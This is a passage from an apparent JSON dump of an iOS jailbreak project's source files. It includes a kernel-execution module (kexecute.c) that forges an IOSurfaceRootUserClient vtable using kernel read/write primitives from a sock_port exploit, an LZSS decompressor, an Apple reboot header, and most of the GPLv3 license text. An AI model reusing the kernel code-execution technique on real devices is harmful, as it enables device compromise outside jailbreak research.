__PRELINK_TEXT, trying again!\\n\");\n }\n return 0;\n}\n" }, { "path": "Kernel Utilities/kexecute.c", "content": "#import \n#import \"kernel_utils.h\"\n#import \"kexecute.h\"\n#import \"../PatchFinder/patchfinder64.h\"\n#import \"../Exploits/sock_port/offsetof.h\"\n#import \"../Exploits/sock_port/include/IOKit/IOKitLib.h\"\n#include \"../Exploits/sock_port/kernel_memory.h\"\n\ntypedef int (*kexecFunc)(uint64_t function, size_t argument_count, ...);\nkexecFunc kernel_exec;\n\nmach_port_t PrepareUserClient(void){\n kern_return_t err;\n mach_port_t UserClient;\n io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching(\"IOSurfaceRoot\"));\n if (service == IO_OBJECT_NULL){\n printf(\"Kernel Execute: unable to find service.\\n\");\n exit(EXIT_FAILURE);\n }\n err = IOServiceOpen(service, mach_task_self(), 0, &UserClient);\n if (err != KERN_SUCCESS){\n printf(\"Kernel Execute: unable to get user client connection.\\n\");\n exit(EXIT_FAILURE);\n }\n printf(\"Kernel Execute: got user client: 0x%x\\n\", UserClient);\n return UserClient;\n}\n\npthread_mutex_t kexecuteLock;\nstatic mach_port_t UserClient = 0;\nstatic uint64_t IOSurfaceRootUserClient_Port = 0;\nstatic uint64_t IOSurfaceRootUserClient_Addr = 0;\nstatic uint64_t FakeVtable = 0;\nstatic uint64_t FakeClient = 0;\nconst int fake_Kernel_alloc_size = 0x1000;\n\nvoid initializeKernelExecute(void) {\n UserClient = PrepareUserClient();\n IOSurfaceRootUserClient_Port = FindPortAddress(UserClient);\n IOSurfaceRootUserClient_Addr = rk64(IOSurfaceRootUserClient_Port + off_ip_kobject);\n uint64_t IOSurfaceRootUserClient_vtab = rk64(IOSurfaceRootUserClient_Addr);\n FakeVtable = kalloc(fake_Kernel_alloc_size);\n for (int i = 0; i < 0x200; i++) {\n wk64(FakeVtable+i*8, rk64(IOSurfaceRootUserClient_vtab+i*8));\n }\n FakeClient = kalloc(fake_Kernel_alloc_size);\n for (int i = 0; i < 0x200; i++) {\n wk64(FakeClient+i*8, rk64(IOSurfaceRootUserClient_Addr+i*8));\n }\n wk64(FakeClient, FakeVtable);\n wk64(IOSurfaceRootUserClient_Port + off_ip_kobject, FakeClient);\n wk64(FakeVtable+8*off_getExternelTrapForIndex, Find_add_x0_x0_0x40_ret());\n\n pthread_mutex_init(&kexecuteLock, NULL);\n if (UserClient){\n printf(\"Kernel Execute: Successfully initialized Kernel Execute Module! \\n\");\n return;\n } else {\n printf(\"Kernel Execute: Failed to initialize Kernel Execute Module! \\n\");\n return;\n }\n}\n\nvoid terminateKernelExecute(void){\n if (!UserClient) return;\n wk64(IOSurfaceRootUserClient_Port + off_ip_kobject, IOSurfaceRootUserClient_Addr);\n kfree(FakeVtable, fake_Kernel_alloc_size);\n kfree(FakeClient, fake_Kernel_alloc_size);\n}\n\nuint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3, uint64_t x4, uint64_t x5, uint64_t x6) {\n if (kernel_exec) {\n return kernel_exec(addr, 7, x0, x1, x2, x3, x4, x5, x6);\n }\n pthread_mutex_lock(&kexecuteLock);\n uint64_t offx20 = rk64(FakeClient+0x40);\n uint64_t offx28 = rk64(FakeClient+0x48);\n wk64(FakeClient+0x40, x0);\n wk64(FakeClient+0x48, addr);\n uint64_t returnval = IOConnectTrap6(UserClient, 0, (uint64_t)(x1), (uint64_t)(x2), (uint64_t)(x3), (uint64_t)(x4), (uint64_t)(x5), (uint64_t)(x6));\n wk64(FakeClient+0x40, offx20);\n wk64(FakeClient+0x48, offx28);\n pthread_mutex_unlock(&kexecuteLock);\n return returnval;\n}\n" }, { "path": "Kernel Utilities/kexecute.h", "content": "#import \n#import \n\nuint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3, uint64_t x4, uint64_t x5, uint64_t x6);\nvoid initializeKernelExecute(void);\nvoid terminateKernelExecute(void);\n" }, { "path": "Kernel Utilities/lzssdec.cpp", "content": "//\n// lzssdec.cpp\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 8/11/20.\n// Copyright © 2020 GeoSn0w. All rights reserved.\n//\n\n#include \"lzssdec.hpp\"\n// (C)2009 Willem Hengeveld itsme@xs4all.nl\n#include \n#include \n#include \n#include \n#include \n#include \n\n// streaming version of the lzss algorithm, as defined in BootX-75/bootx.tproj/sl.subproj/lzss.c\n// you can use lzssdec in a filter, like:\n//\n// cat file.lzss | lzssdec > file.decompressed\n//\nstatic int g_debug= 0;\n\nclass lzssdecompress\n{\n enum { COPYFROMDICT, EXPECTINGFLAG, PROCESSFLAGBIT, EXPECTING2NDBYTE };\n int _state;\n uint8_t _flags;\n int _bitnr;\n uint8_t *_src, *_srcend;\n uint8_t *_dst, *_dstend;\n uint8_t _firstbyte;\n \n uint8_t *_dict;\n \n int _dictsize;\n int _maxmatch;\n int _copythreshold;\n \n int _dictptr;\n \n int _copyptr;\n int _copycount;\n \n int _inputoffset;\n int _outputoffset;\npublic:\n lzssdecompress()\n {\n _maxmatch= 18; // 4 bit size + threshold\n _dictsize= 4096; // 12 bit size\n _copythreshold= 3; // 0 == copy 3 bytes\n _dict= new uint8_t[_dictsize+_maxmatch-1];\n \n reset();\n }\n ~lzssdecompress()\n {\n delete[] _dict;\n _dict= 0; _dictsize= 0;\n }\n void reset()\n {\n _state=EXPECTINGFLAG;\n _flags= 0; _bitnr= 0;\n _src=_srcend=_dst=_dstend=0;\n memset(_dict, ' ', _dictsize+_maxmatch-1);\n _dictptr= _dictsize-_maxmatch;\n _inputoffset= 0;\n _outputoffset= 0;\n _firstbyte= 0;\n _copyptr= 0;\n _copycount= 0;\n }\n void decompress(uint8_t *dst, uint32_t dstlen, uint32_t *pdstused, uint8_t *src, uint32_t srclen, uint32_t *psrcused)\n {\n _src= src; _srcend= src+srclen;\n _dst= dst; _dstend= dst+dstlen;\n \n while (_src<_srcend && _dst<_dstend)\n {\n switch(_state)\n {\n case EXPECTINGFLAG:\n if (g_debug) fprintf(stderr, \"%08x,%08x: flag: %02x\\n\", _inputoffset, _outputoffset, *_src);\n _flags= *_src++;\n _inputoffset++;\n _bitnr= 0;\n _state= PROCESSFLAGBIT;\n break;\n case PROCESSFLAGBIT:\n if (_flags&1) {\n if (g_debug) fprintf(stderr, \"%08x,%08x: bit%d: %03x copybyte %02x\\n\", _inputoffset, _outputoffset, _bitnr, _dictptr, *_src);\n addtodict(*_dst++ = *_src++);\n _inputoffset++;\n _outputoffset++;\n nextflagbit();\n }\n else {\n _firstbyte= *_src++;\n _inputoffset++;\n _state= EXPECTING2NDBYTE;\n }\n break;\n case EXPECTING2NDBYTE:\n {\n uint8_t secondbyte= *_src++;\n _inputoffset++;\n setcounter(_firstbyte, secondbyte);\n if (g_debug) fprintf(stderr, \"%08x,%08x: bit%d: %03x %02x %02x : copy %d bytes from %03x\", _inputoffset-2, _outputoffset, _bitnr, _dictptr, _firstbyte, secondbyte, _copycount, _copyptr);\n if (g_debug) dumpcopydata();\n _state= COPYFROMDICT;\n }\n break;\n case COPYFROMDICT:\n copyfromdict();\n break;\n }\n }\n if (g_debug) fprintf(stderr, \"decompress state= %d, copy: 0x%x, 0x%x\\n\", _state, _copyptr, _copycount);\n if (pdstused) *pdstused= _dst-dst;\n if (psrcused) *psrcused= _src-src;\n }\n void flush(uint8_t *dst, uint32_t dstlen, uint32_t *pdstused)\n {\n if (g_debug) fprintf(stderr, \"flash before state= %d, copy: 0x%x, 0x%x\\n\", _state, _copyptr, _copycount);\n _src= _srcend= NULL;\n _dst= dst; _dstend= dst+dstlen;\n \n if (_state==COPYFROMDICT)\n copyfromdict();\n \n if (pdstused) *pdstused= _dst-dst;\n if (g_debug) fprintf(stderr, \"flash after state= %d, copy: 0x%x, 0x%x\\n\", _state, _copyptr, _copycount);\n }\n void copyfromdict()\n {\n while (_dst<_dstend && _copycount)\n {\n addtodict(*_dst++ = _dict[_copyptr++]);\n _outputoffset++;\n _copycount--;\n _copyptr= _copyptr&(_dictsize-1);\n }\n if (_copycount==0)\n nextflagbit();\n }\n void dumpcopydata()\n {\n // note: we are printing incorrect data, if _copyptr == _dictptr-1\n for (int i=0 ; i<_copycount ; i++)\n fprintf(stderr, \" %02x\", _dict[(_copyptr+i)&(_dictsize-1)]);\n fprintf(stderr, \"\\n\");\n }\n void addtodict(uint8_t c)\n {\n _dict[_dictptr++]= c;\n _dictptr = _dictptr&(_dictsize-1);\n }\n void nextflagbit()\n {\n _bitnr++;\n _flags>>=1;\n _state = _bitnr==8 ? EXPECTINGFLAG : PROCESSFLAGBIT;\n }\n void setcounter(uint8_t first, uint8_t second)\n {\n _copyptr= first | ((second&0xf0)<<4);\n _copycount= _copythreshold + (second&0xf);\n }\n};\n\nvoid usage(int argc,char**argv)\n{\n char *name = NULL;\n name = strrchr(argv[0], '/');\n fprintf(stderr, \"Usage: %s [-d] [-o OFFSET] \\n\",(name ? name + 1: argv[0]));\n}\nextern \"C\" int lzssdec(int argc,char**argv)\n{\n FILE *readFrom = NULL;\n FILE *outputDir = NULL;\n \n#define HANDLEULOPTION(var, type) (argv[i][2] ? var= (type)strtoul(argv[i]+2, 0, 0) : i+1 bytes\n while (skipbytes && !feof(readFrom)) {\n int nr= fread(ibuf, 1, std::min(skipbytes,(uint32_t)CHUNK), readFrom);\n skipbytes -= nr;\n }\n \n while (!feof(readFrom))\n {\n size_t nr= fread(ibuf, 1, CHUNK, readFrom);\n if (nr==0) {\n perror(\"read\");\n return 1;\n }\n if (nr==0)\n break;\n \n size_t srcp= 0;\n while (srcp 0x%x\\n\", srcused, dstused);\n }\n }\n if (g_debug) fprintf(stderr, \"done reading\\n\");\n uint32_t dstused;\n lzss.flush(obuf, CHUNK, &dstused);\n size_t nw= fwrite(obuf, 1, dstused, outputDir);\n if (nw\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n int lzssdec(int argc,char**argv);\n#ifdef __cplusplus\n}\n\n#endif\n\n\n#endif /* lzssdec_hpp */\n" }, { "path": "Kernel Utilities/system_reboot.h", "content": "/*\n * Copyright (c) 2000-2006 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n * \n * This file contains Original Code and/or Modifications of Original Code\n * as defined in and that are subject to the Apple Public Source License\n * Version 2.0 (the 'License'). You may not use this file except in\n * compliance with the License. The rights granted to you under the License\n * may not be used to create, or enable the creation or redistribution of,\n * unlawful or unlicensed copies of an Apple operating system, or to\n * circumvent, violate, or enable the circumvention or violation of, any\n * terms of an Apple operating system software license agreement.\n * \n * Please obtain a copy of the License at\n * http://www.opensource.apple.com/apsl/ and read it before using this file.\n * \n * The Original Code and all software distributed under the License are\n * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER\n * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,\n * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.\n * Please see the License for the specific language governing rights and\n * limitations under the License.\n * \n * @APPLE_OSREFERENCE_LICENSE_HEADER_END@\n */\n/* Copyright (c) 1995 NeXT Computer, Inc. All Rights Reserved */\n/*\n * Copyright (c) 1982, 1986, 1988, 1993, 1994\n *\tThe Regents of the University of California. All rights reserved.\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n * 1. Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n * 2. Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the distribution.\n * 3. All advertising materials mentioning features or use of this software\n * must display the following acknowledgement:\n *\tThis product includes software developed by the University of\n *\tCalifornia, Berkeley and its contributors.\n * 4. Neither the name of the University nor the names of its contributors\n * may be used to endorse or promote products derived from this software\n * without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND\n * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE\n * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS\n * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\n * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY\n * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF\n * SUCH DAMAGE.\n *\n *\t@(#)reboot.h\t8.3 (Berkeley) 12/13/94\n */\n\n#ifndef\t_SYS_REBOOT_H_\n#define _SYS_REBOOT_H_\n\n#include \n#include \n#include \n\n/*\n * Arguments to reboot system call.\n */\n\n#ifdef __APPLE_API_PRIVATE\n#define RB_AUTOBOOT\t0\t/* flags for system auto-booting itself */\n\n#define RB_ASKNAME\t0x01\t/* ask for file name to reboot from */\n#define RB_SINGLE\t0x02\t/* reboot to single user only */\n#define RB_NOSYNC\t0x04\t/* dont sync before reboot */\n#define RB_HALT\t\t0x08\t/* don't reboot, just halt */\n#define RB_INITNAME\t0x10\t/* name given for /etc/init */\n#define RB_DFLTROOT\t0x20\t/* use compiled-in rootdev */\n#define RB_ALTBOOT\t0x40\t/* use /boot.old vs /boot */\n#define RB_UNIPROC\t0x80\t/* don't start slaves */\n#define RB_SAFEBOOT\t0x100\t/* booting safe */\n#define RB_UPSDELAY 0x200 /* Delays restart by 5 minutes */\n#define RB_QUICK\t0x400\t/* quick and ungraceful reboot with file system caches flushed*/\n#define RB_PANIC\t0x800 /* panic the kernel */\n\n__BEGIN_DECLS\n/* userspace reboot control */\nint usrctl(uint32_t flags);\n/* The normal reboot syscall. */\nint reboot(int howto);\n/* Used with RB_PANIC to panic the kernel from userspace with a message.\n * Requires an entitlement on Release. */\nint reboot_np(int howto, const char *message);\n__END_DECLS\n\n#endif /* __APPLE_API_PRIVATE */\n\n#ifdef __APPLE_API_OBSOLETE\n/*\n * Constants for converting boot-style device number to type,\n * adaptor (uba, mba, etc), unit number and partition number.\n * Type (== major device number) is in the low byte\n * for backward compatibility. Except for that of the \"magic\n * number\", each mask applies to the shifted value.\n * Format:\n *\t (4) (4) (4) (4) (8) (8)\n *\t--------------------------------\n *\t|MA | AD| CT| UN| PART | TYPE |\n *\t--------------------------------\n */\n#define B_ADAPTORSHIFT\t24\n#define B_ADAPTORMASK\t0x0f\n#define\tB_ADAPTOR(val)\t\t(((val) >> B_ADAPTORSHIFT) & B_ADAPTORMASK)\n#define B_CONTROLLERSHIFT\t20\n#define B_CONTROLLERMASK\t0xf\n#define\tB_CONTROLLER(val)\t(((val)>>B_CONTROLLERSHIFT) & B_CONTROLLERMASK)\n#define B_UNITSHIFT\t16\n#define B_UNITMASK\t0xff\n#define\tB_UNIT(val)\t\t(((val) >> B_UNITSHIFT) & B_UNITMASK)\n#define B_PARTITIONSHIFT 8\n#define B_PARTITIONMASK\t0xff\n#define\tB_PARTITION(val)\t(((val) >> B_PARTITIONSHIFT) & B_PARTITIONMASK)\n#define B_TYPESHIFT\t0\n#define B_TYPEMASK\t0xff\n#define\tB_TYPE(val)\t\t(((val) >> B_TYPESHIFT) & B_TYPEMASK)\n#define B_MAGICMASK\t0xf0000000\n#define B_DEVMAGIC\t0xa0000000\n\n#define MAKEBOOTDEV(type, adaptor, controller, unit, partition) \\\n\t(((type) << B_TYPESHIFT) | ((adaptor) << B_ADAPTORSHIFT) | \\\n\t((controller) << B_CONTROLLERSHIFT) | ((unit) << B_UNITSHIFT) | \\\n\t((partition) << B_PARTITIONSHIFT) | B_DEVMAGIC)\n\n#endif /* __APPLE_API_OBSOLETE */\n\n\n\n#endif\t/* _SYS_REBOOT_H_ */\n" }, { "path": "LICENSE", "content": " GNU GENERAL PUBLIC LICENSE\n Version 3, 29 June 2007\n\n Copyright (C) 2007 Free Software Foundation, Inc. \n Everyone is permitted to copy and distribute verbatim copies\n of this license document, but changing it is not allowed.\n\n Preamble\n\n The GNU General Public License is a free, copyleft license for\nsoftware and other kinds of works.\n\n The licenses for most software and other practical works are designed\nto take away your freedom to share and change the works. By contrast,\nthe GNU General Public License is intended to guarantee your freedom to\nshare and change all versions of a program--to make sure it remains free\nsoftware for all its users. We, the Free Software Foundation, use the\nGNU General Public License for most of our software; it applies also to\nany other work released this way by its authors. You can apply it to\nyour programs, too.\n\n When we speak of free software, we are referring to freedom, not\nprice. Our General Public Licenses are designed to make sure that you\nhave the freedom to distribute copies of free software (and charge for\nthem if you wish), that you receive source code or can get it if you\nwant it, that you can change the software or use pieces of it in new\nfree programs, and that you know you can do these things.\n\n To protect your rights, we need to prevent others from denying you\nthese rights or asking you to surrender the rights. Therefore, you have\ncertain responsibilities if you distribute copies of the software, or if\nyou modify it: responsibilities to respect the freedom of others.\n\n For example, if you distribute copies of such a program, whether\ngratis or for a fee, you must pass on to the recipients the same\nfreedoms that you received. You must make sure that they, too, receive\nor can get the source code. And you must show them these terms so they\nknow their rights.\n\n Developers that use the GNU GPL protect your rights with two steps:\n(1) assert copyright on the software, and (2) offer you this License\ngiving you legal permission to copy, distribute and/or modify it.\n\n For the developers' and authors' protection, the GPL clearly explains\nthat there is no warranty for this free software. For both users' and\nauthors' sake, the GPL requires that modified versions be marked as\nchanged, so that their problems will not be attributed erroneously to\nauthors of previous versions.\n\n Some devices are designed to deny users access to install or run\nmodified versions of the software inside them, although the manufacturer\ncan do so. This is fundamentally incompatible with the aim of\nprotecting users' freedom to change the software. The systematic\npattern of such abuse occurs in the area of products for individuals to\nuse, which is precisely where it is most unacceptable. Therefore, we\nhave designed this version of the GPL to prohibit the practice for those\nproducts. If such problems arise substantially in other domains, we\nstand ready to extend this provision to those domains in future versions\nof the GPL, as needed to protect the freedom of users.\n\n Finally, every program is threatened constantly by software patents.\nStates should not allow patents to restrict development and use of\nsoftware on general-purpose computers, but in those that do, we wish to\navoid the special danger that patents applied to a free program could\nmake it effectively proprietary. To prevent this, the GPL assures that\npatents cannot be used to render the program non-free.\n\n The precise terms and conditions for copying, distribution and\nmodification follow.\n\n TERMS AND CONDITIONS\n\n 0. Definitions.\n\n \"This License\" refers to version 3 of the GNU General Public License.\n\n \"Copyright\" also means copyright-like laws that apply to other kinds of\nworks, such as semiconductor masks.\n\n \"The Program\" refers to any copyrightable work licensed under this\nLicense. Each licensee is addressed as \"you\". \"Licensees\" and\n\"recipients\" may be individuals or organizations.\n\n To \"modify\" a work means to copy from or adapt all or part of the work\nin a fashion requiring copyright permission, other than the making of an\nexact copy. The resulting work is called a \"modified version\" of the\nearlier work or a work \"based on\" the earlier work.\n\n A \"covered work\" means either the unmodified Program or a work based\non the Program.\n\n To \"propagate\" a work means to do anything with it that, without\npermission, would make you directly or secondarily liable for\ninfringement under applicable copyright law, except executing it on a\ncomputer or modifying a private copy. Propagation includes copying,\ndistribution (with or without modification), making available to the\npublic, and in some countries other activities as well.\n\n To \"convey\" a work means any kind of propagation that enables other\nparties to make or receive copies. Mere interaction with a user through\na computer network, with no transfer of a copy, is not conveying.\n\n An interactive user interface displays \"Appropriate Legal Notices\"\nto the extent that it includes a convenient and prominently visible\nfeature that (1) displays an appropriate copyright notice, and (2)\ntells the user that there is no warranty for the work (except to the\nextent that warranties are provided), that licensees may convey the\nwork under this License, and how to view a copy of this License. If\nthe interface presents a list of user commands or options, such as a\nmenu, a prominent item in the list meets this criterion.\n\n 1. Source Code.\n\n The \"source code\" for a work means the preferred form of the work\nfor making modifications to it. \"Object code\" means any non-source\nform of a work.\n\n A \"Standard Interface\" means an interface that either is an official\nstandard defined by a recognized standards body, or, in the case of\ninterfaces specified for a particular programming language, one that\nis widely used among developers working in that language.\n\n The \"System Libraries\" of an executable work include anything, other\nthan the work as a whole, that (a) is included in the normal form of\npackaging a Major Component, but which is not part of that Major\nComponent, and (b) serves only to enable use of the work with that\nMajor Component, or to implement a Standard Interface for which an\nimplementation is available to the public in source code form. A\n\"Major Component\", in this context, means a major essential component\n(kernel, window system, and so on) of the specific operating system\n(if any) on which the executable work runs, or a compiler used to\nproduce the work, or an object code interpreter used to run it.\n\n The \"Corresponding Source\" for a work in object code form means all\nthe source code needed to generate, install, and (for an executable\nwork) run the object code and to modify the work, including scripts to\ncontrol those activities. However, it does not include the work's\nSystem Libraries, or general-purpose tools or generally available free\nprograms which are used unmodified in performing those activities but\nwhich are not part of the work. For example, Corresponding Source\nincludes interface definition files associated with source files for\nthe work, and the source code for shared libraries and dynamically\nlinked subprograms that the work is specifically designed to require,\nsuch as by intimate data communication or control flow between those\nsubprograms and other parts of the work.\n\n The Corresponding Source need not include anything that users\ncan regenerate automatically from other parts of the Corresponding\nSource.\n\n The Corresponding Source for a work in source code form is that\nsame work.\n\n 2. Basic Permissions.\n\n All rights granted under this License are granted for the term of\ncopyright on the Program, and are irrevocable provided the stated\nconditions are met. This License explicitly affirms your unlimited\npermission to run the unmodified Program. The output from running a\ncovered work is covered by this License only if the output, given its\ncontent, constitutes a covered work. This License acknowledges your\nrights of fair use or other equivalent, as provided by copyright law.\n\n You may make, run and propagate covered works that you do not\nconvey, without conditions so long as your license otherwise remains\nin force. You may convey covered works to others for the sole purpose\nof having them make modifications exclusively for you, or provide you\nwith facilities for running those works, provided that you comply with\nthe terms of this License in conveying all material for which you do\nnot control copyright. Those thus making or running the covered works\nfor you must do so exclusively on your behalf, under your direction\nand control, on terms that prohibit them from making any copies of\nyour copyrighted material outside their relationship with you.\n\n Conveying under any other circumstances is permitted solely under\nthe conditions stated below. Sublicensing is not allowed; section 10\nmakes it unnecessary.\n\n 3. Protecting Users' Legal Rights From Anti-Circumvention Law.\n\n No covered work shall be deemed part of an effective technological\nmeasure under any applicable law fulfilling obligations under article\n11 of the WIPO copyright treaty adopted on 20 December 1996, or\nsimilar laws prohibiting or restricting circumvention of such\nmeasures.\n\n When you convey a covered work, you waive any legal power to forbid\ncircumvention of technological measures to the extent such circumvention\nis effected by exercising rights under this License with respect to\nthe covered work, and you disclaim any intention to limit operation or\nmodification of the work as a means of enforcing, against the work's\nusers, your or third parties' legal rights to forbid circumvention of\ntechnological measures.\n\n 4. Conveying Verbatim Copies.\n\n You may convey verbatim copies of the Program's source code as you\nreceive it, in any medium, provided that you conspicuously and\nappropriately publish on each copy an appropriate copyright notice;\nkeep intact all notices stating that this License and any\nnon-permissive terms added in accord with section 7 apply to the code;\nkeep intact all notices of the absence of any warranty; and give all\nrecipients a copy of this License along with the Program.\n\n You may charge any price or no price for each copy that you convey,\nand you may offer support or warranty protection for a fee.\n\n 5. Conveying Modified Source Versions.\n\n You may convey a work based on the Program, or the modifications to\nproduce it from the Program, in the form of source code under the\nterms of section 4, provided that you also meet all of these conditions:\n\n a) The work must carry prominent notices stating that you modified\n it, and giving a relevant date.\n\n b) The work must carry prominent notices stating that it is\n released under this License and any conditions added under section\n 7. This requirement modifies the requirement in section 4 to\n \"keep intact all notices\".\n\n c) You must license the entire work, as a whole, under this\n License to anyone who comes into possession of a copy. This\n License will therefore apply, along with any applicable section 7\n additional terms, to the whole of the work, and all its parts,\n regardless of how they are packaged. This License gives no\n permission to license the work in any other way, but it does not\n invalidate such permission if you have separately received it.\n\n d) If the work has interactive user interfaces, each must display\n Appropriate Legal Notices; however, if the Program has interactive\n interfaces that do not display Appropriate Legal Notices, your\n work need not make them do so.\n\n A compilation of a covered work with other separate and independent\nworks, which are not by their nature extensions of the covered work,\nand which are not combined with it such as to form a larger program,\nin or on a volume of a storage or distribution medium, is called an\n\"aggregate\" if the compilation and its resulting copyright are not\nused to limit the access or legal rights of the compilation's users\nbeyond what the individual works permit. Inclusion of a covered work\nin an aggregate does not cause this License to apply to the other\nparts of the aggregate.\n\n 6. Conveying Non-Source Forms.\n\n You may convey a covered work in object code form under the terms\nof sections 4 and 5, provided that you also convey the\nmachine-readable Corresponding Source under the terms of this License,\nin one of these ways:\n\n a) Convey the object code in, or embodied in, a physical product\n (including a physical distribution medium), accompanied by the\n Corresponding Source fixed on a durable physical medium\n customarily used for software interchange.\n\n b) Convey the object code in, or embodied in, a physical product\n (including a physical distribution medium), accompanied by a\n written offer, valid for at least three years and valid for as\n long as you offer spare parts or customer support for that product\n model, to give anyone who possesses the object code either (1) a\n copy of the Corresponding Source for all the software in the\n product that is covered by this License, on a durable physical\n medium customarily used for software interchange, for a price no\n more than your reasonable cost of physically performing this\n conveying of source, or (2) access to copy the\n Corresponding Source from a network server at no charge.\n\n c) Convey individual copies of the object code with a copy of the\n written offer to provide the Corresponding Source. This\n alternative is allowed only occasionally and noncommercially, and\n only if you received the object code with such an offer, in accord\n with subsection 6b.\n\n d) Convey the object code by offering access from a designated\n place (gratis or for a charge), and offer equivalent access to the\n Corresponding Source in the same way through the same place at no\n further charge. You need not require recipients to copy the\n Corresponding Source along with the object code. If the place to\n copy the object code is a network server, the Corresponding Source\n may be on a different server (operated by you or a third party)\n that supports equivalent copying facilities, provided you maintain\n clear directions next to the object code saying where to find the\n Corresponding Source. Regardless of what server hosts the\n Corresponding Source, you remain obligated to ensure that it is\n available for as long as needed to satisfy these requirements.\n\n e) Convey the object code using peer-to-peer transmission, provided\n you inform other peers where the object code and Corresponding\n Source of the work are being offered to the general public at no\n charge under subsection 6d.\n\n A separable portion of the object code, whose source code is excluded\nfrom the Corresponding Source as a System Library, need not be\nincluded in conveying the object code work.\n\n A \"User Product\" is either (1) a \"consumer product\", which means any\ntangible personal property which is normally used for personal, family,\nor household purposes, or (2) anything designed or sold for incorporation\ninto a dwelling. In determining whether a product is a consumer product,\ndoubtful cases shall be resolved in favor of coverage. For a particular\nproduct received by a particular user, \"normally used\" refers to a\ntypical or common use of that class of product, regardless of the status\nof the particular user or of the way in which the particular user\nactually uses, or expects or is expected to use, the product. A product\nis a consumer product regardless of whether the product has substantial\ncommercial, industrial or non-consumer uses, unless such uses represent\nthe only significant mode of use of the product.\n\n \"Installation Information\" for a User Product means any methods,\nprocedures, authorization keys, or other information required to install\nand execute modified versions of a covered work in that User Product from\na modified version of its Corresponding Source. The information must\nsuffice to ensure that the continued functioning of the modified object\ncode is in no case prevented or interfered with solely because\nmodification has been made.\n\n If you convey an object code work under this section in, or with, or\nspecifically for use in, a User Product, and the conveying occurs as\npart of a transaction in which the right of possession and use of the\nUser Product is transferred to the recipient in perpetuity or for a\nfixed term (regardless of how the transaction is characterized), the\nCorresponding Source conveyed under this section must be accompanied\nby the Installation Information. But this requirement does not apply\nif neither you nor any third party retains the ability to install\nmodified object code on the User Product (for example, the work has\nbeen installed in ROM).\n\n The requirement to provide Installation Information does not include a\nrequirement to continue to provide support service, warranty, or updates\nfor a work that has been modified or installed by the recipient, or for\nthe User Product in which it has been modified or installed. Access to a\nnetwork may be denied when the modification itself materially and\nadversely affects the operation of the network or violates the rules and\nprotocols for communication across the network.\n\n Corresponding Source conveyed, and Installation Information provided,\nin accord with this section must be in a format that is publicly\ndocumented (and with an implementation available to the public in\nsource code form), and must require no special password or key for\nunpacking, reading or copying.\n\n 7. Additional Terms.\n\n \"Additional permissions\" are terms that supplement the terms of this\nLicense by making exceptions from one or more of its conditions.\nAdditional permissions that are applicable to the entire Program shall\nbe treated as though they were included in this License, to the extent\nthat they are valid under applicable law. If additional permissions\napply only to part of the Program, that part may be used separately\nunder those permissions, but the entire Program remains governed by\nthis License without regard to the additional permissions.\n\n When you convey a copy of a covered work, you may at your option\nremove any additional permissions from that copy, or from any part of\nit. (Additional permissions may be written to require their own\nremoval in certain cases when you modify the work.) You may place\nadditional permissions on material, added by you to a covered work,\nfor which you have or can give appropriate copyright permission.\n\n Notwithstanding any other provision of this License, for material you\nadd to a covered work, you may (if authorized by the copyright holders of\nthat material) supplement the terms of this License with terms:\n\n a) Disclaiming warranty or limiting liability differently from the\n terms of sections 15 and 16 of this License; or\n\n b) Requiring preservation of specified reasonable legal notices or\n author attributions in that material or in the Appropriate Legal\n Notices displayed by works containing it; or\n\n c) Prohibiting misrepresentation of the origin of that material, or\n requiring that modified versions of such material be marked in\n reasonable ways as different from the original version; or\n\n d) Limiting the use for publicity purposes of names of licensors or\n authors of the material; or\n\n e) Declining to grant rights under trademark law for use of some\n trade names, trademarks, or service marks; or\n\n f) Requiring indemnification of licensors and authors of that\n material by anyone who conveys the material (or modified versions of\n it) with contractual assumptions of liability to the recipient, for\n any liability that these contractual assumptions directly impose on\n those licensors and authors.\n\n All other non-permissive additional terms are considered \"further\nrestrictions\" within the meaning of section 10. If the Program as you\nreceived it, or any part of it, contains a notice stating that it is\ngoverned by this License along with a term that is a further\nrestriction, you may remove that term. If a license document contains\na further restriction but permits relicensing or conveying under this\nLicense, you may add to a covered work material governed by the terms\nof that license document, provided that the further restriction does\nnot survive such relicensing or conveying.\n\n If you add terms to a covered work in accord with this section, you\nmust place, in the relevant source files, a statement of the\nadditional terms that apply to those files, or a notice indicating\nwhere to find the applicable terms.\n\n Additional terms, permissive or non-permissive, may be stated in the\nform of a separately written license, or stated as exceptions;\nthe above requirements apply either way.\n\n 8. Termination.\n\n You may not propagate or modify a covered work except as expressly\nprovided under this License. Any attempt otherwise to propagate or\nmodify it is void, and will automatically terminate your rights 